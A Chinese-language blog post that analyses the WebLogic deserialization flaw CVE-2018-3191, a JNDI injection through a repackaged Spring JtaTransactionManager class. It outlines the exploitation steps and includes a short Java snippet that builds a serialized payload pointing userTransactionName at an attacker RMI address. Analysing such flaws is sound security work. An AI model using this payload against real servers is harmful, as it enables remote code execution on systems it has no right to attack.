weblogic之CVE-2018-3191漏洞分析
weblogic之CVE-2018-3191漏洞分析
理解這個漏洞首先需要看這篇文章:https://www.cnblogs.com/afanti/p/10193169.html
引用廖新喜說的,說白的就是反序列化時lookup中的引數可控,導致 JNDI注入
AbstractPlatformTransactionManager這個黑名單就是用於防止Spring JNDI注入,從官方以前的黑名單上就能看到org.springframework.transaction.support.AbstractPlatformTransactionManager,但是官方沒有想到在com.bea.core.repackaged的相關包還有spring的相關類。其實這兩個包中的類實現幾乎一樣,只是來源於不同的包。
看下利用過程:
生成poc.
伺服器開啟jndi服務,ExportObject.java惡意類就是彈個計算器
通過T3協議傳送資料包,伺服器向jndi請求惡意類,反序列化導致RCE:
跟一下漏洞過程:
來到com.bea.core.repackaged.springframework.transaction.jta.JtaTransactionManager類的initUserTransactionAndTransactionManager方法,this.userTransactionName屬性被賦值為惡意rmi地址,跟進164行:
跟進lookup方法
最後看一下poc生成過程:
匯入所用到的com.bea.core.repackaged.springframework.spring_1.2.0.0_2-5-3.jar包和com.bea.core.repackaged.apache.commons.logging_1.2.1.jar包,將UserTransactionName引數注入惡意類地址。
String test; System.out.println("hahha"); test = "rmi://192.168.20.112:2222/aa"; JtaTransactionManager jtaTransactionManager = new JtaTransactionManager(); jtaTransactionManager.setUserTransactionName(test); File f = new File("E:\\Struts2-Vulenv-master\\ysoserial\\src\\main\\java\\ysoserial\\obj.txt"); ObjectOutputStream out1 = new ObjectOutputStream(new FileOutputStream(f)); out1.writeObject(jtaTransactionManager); out1.flush(); out1.close();
參考連結:
https://paper.tuisec.win/detail/a312d98e0285e24
https://github.com/pyn3rd/CVE-2018-3191
https://paper.seebug.org/718/